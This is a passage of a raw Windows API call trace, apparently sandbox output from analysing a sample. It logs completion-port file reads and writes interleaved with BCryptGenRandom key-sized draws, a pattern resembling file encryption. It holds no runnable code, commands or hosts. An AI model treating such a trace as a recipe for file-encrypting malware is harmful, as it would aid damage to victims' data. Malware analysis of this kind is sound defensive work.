lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.559] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.559] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.559] free (_Block=0x77d7a8) [0113.559] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.559] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.560] free (_Block=0x2071c20) [0113.560] free (_Block=0x2071d30) [0113.560] free (_Block=0x77d8b0) [0113.560] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.931] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x7620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.946] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.946] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.946] free (_Block=0x77d7a8) [0113.946] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.946] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.946] free (_Block=0x2071c20) [0113.946] free (_Block=0x2071d30) [0113.946] free (_Block=0x77d8b0) [0113.946] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.952] CloseHandle (hObject=0x13c0) returned 1 [0113.954] free (_Block=0x3ef0008) [0113.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.963] ReadFile (in: hFile=0x340, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x3df0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.988] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4712, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0114.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.011] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x17b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.019] WriteFile (in: hFile=0x340, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.072] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.073] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.077] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2a40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0114.084] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.133] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2afa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0114.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.187] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.214] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.214] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.214] free (_Block=0x77d7a8) [0114.214] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.214] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.215] free (_Block=0x2071c20) [0114.215] free (_Block=0x2071d30) [0114.215] free (_Block=0x77d8b0) [0114.215] WriteFile (in: hFile=0x3bc, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.226] CloseHandle (hObject=0x340) returned 1 [0114.228] free (_Block=0x1ff1e60) [0114.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.231] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x22de, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0114.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.406] CloseHandle (hObject=0x2f4) returned 1 [0114.408] free (_Block=0x3ef0008) [0114.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.415] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.417] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.417] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.417] free (_Block=0x77d7a8) [0114.417] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.417] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.418] free (_Block=0x2071c20) [0114.418] free (_Block=0x2071d30) [0114.418] free (_Block=0x77d8b0) [0114.418] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.438] CloseHandle (hObject=0x3bc) returned 1 [0114.440] free (_Block=0x1ff1e60) [0114.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.452] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.452] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.452] free (_Block=0x77d7a8) [0114.452] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.452] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.453] free (_Block=0x2071c20) [0114.453] free (_Block=0x2071d30) [0114.453] free (_Block=0x77d8b0) [0114.453] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.465] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.465] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.465] free (_Block=0x77d7a8) [0114.465] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.465] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.465] free (_Block=0x2071c20) [0114.465] free (_Block=0x2071d30) [0114.465] free (_Block=0x77d8b0) [0114.465] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.485] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.485] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.485] free (_Block=0x77d7a8) [0114.485] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.485] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.486] free (_Block=0x2071c20) [0114.486] free (_Block=0x2071d30) [0114.486] free (_Block=0x77d8b0) [0114.486] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.538] CloseHandle (hObject=0x81c) returned 1 [0114.540] free (_Block=0x3e70008) [0114.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.548] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa6d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0114.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0114.582] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.582] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.582] free (_Block=0x77d7a8) [0114.583] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.583] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.583] free (_Block=0x2071c20) [0114.583] free (_Block=0x2071d30) [0114.583] free (_Block=0x77d8b0) [0114.583] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.589] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0114.592] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.700] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.714] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0115.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0115.727] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.727] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.727] free (_Block=0x77d7a8) [0115.727] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.727] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.728] free (_Block=0x2071c20) [0115.728] free (_Block=0x2071d30) [0115.728] free (_Block=0x77d8b0) [0115.728] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.738] CloseHandle (hObject=0x81c) returned 1 [0115.740] free (_Block=0x3ef0008) [0115.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.756] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x91c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0115.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.824] CloseHandle (hObject=0x13c0) returned 1 [0115.825] free 